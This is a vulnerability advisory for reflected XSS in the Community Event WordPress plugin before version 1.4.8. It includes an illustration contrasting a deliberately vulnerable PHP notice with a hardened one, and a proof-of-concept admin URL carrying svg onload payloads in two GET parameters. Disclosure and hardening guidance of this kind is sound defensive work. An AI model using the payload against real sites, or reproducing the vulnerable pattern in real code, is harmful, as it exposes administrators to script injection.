WordPress Plugin Vulnerabilities
Community Event < 1.4.8 - Reflected Cross-Site Scripting (XSS)
Description
The plugin does not sanitise, validate or escape its importrowscount and successimportcount GET parameters before outputting them back in an admin page, leading to a reflected Cross-Site Scripting issue that executes in the context of a logged-in administrator.
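To make the defect concrete from the defender's side, here is an added illustration of the pattern the description refers to: an admin-page notice that echoes the two GET parameters, shown first in the vulnerable form and then hardened with WordPress's own helpers. This is example code written for this page, not the plugin's source; the parameter names come from the advisory, while the function names, notice markup and message text are assumptions.

```php
<?php
// Added illustration (not the plugin's code). Parameter names are from the
// advisory; function names and message text are assumed for the example.

// Vulnerable pattern: the raw query-string values land in the admin page
// unescaped, so a crafted link runs script in the administrator's browser.
function ce_import_notice_vulnerable() {
    $rows    = isset( $_GET['importrowscount'] ) ? $_GET['importrowscount'] : 0;
    $success = isset( $_GET['successimportcount'] ) ? $_GET['successimportcount'] : 0;
    echo '<div class="notice notice-success"><p>Imported ' . $success
        . ' of ' . $rows . ' rows.</p></div>';
}

// Hardened version: both values are counts, so coerce them to non-negative
// integers with absint() (validation by type). esc_html() is kept as a second
// layer so that a later change to a free-text value cannot reintroduce the bug.
function ce_import_notice_hardened() {
    $rows    = isset( $_GET['importrowscount'] )
        ? absint( wp_unslash( $_GET['importrowscount'] ) ) : 0;
    $success = isset( $_GET['successimportcount'] )
        ? absint( wp_unslash( $_GET['successimportcount'] ) ) : 0;
    printf(
        '<div class="notice notice-success"><p>%s</p></div>',
        esc_html( sprintf( 'Imported %d of %d rows.', $success, $rows ) )
    );
}
```

Because the two parameters are numeric counts, absint() alone already neutralises the payload in the PoC: any markup collapses to 0. For parameters that legitimately carry text, the equivalent fix is sanitize_text_field() on input and esc_html() (or esc_attr() inside attributes) at the point of output.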
Proof of Concept
http://wp.lab/wordpress/wp-admin/admin.php?page=community-events-venues&messages=9&importrowscount=%3Csvg%2Fonload%3Dalert%28%2FXSS%2F%29%3E&successimportcount=%3Csvg%2Fonload%3Dalert%28%2FXSS2%2F%29%3E
Classification
Type: XSS
Miscellaneous
Original Researcher: iohex
Submitter: iohex
Verified: Yes
Timeline
Publicly Published: 2021-07-02
Added: 2021-07-02
Last Updated: 2022-01-17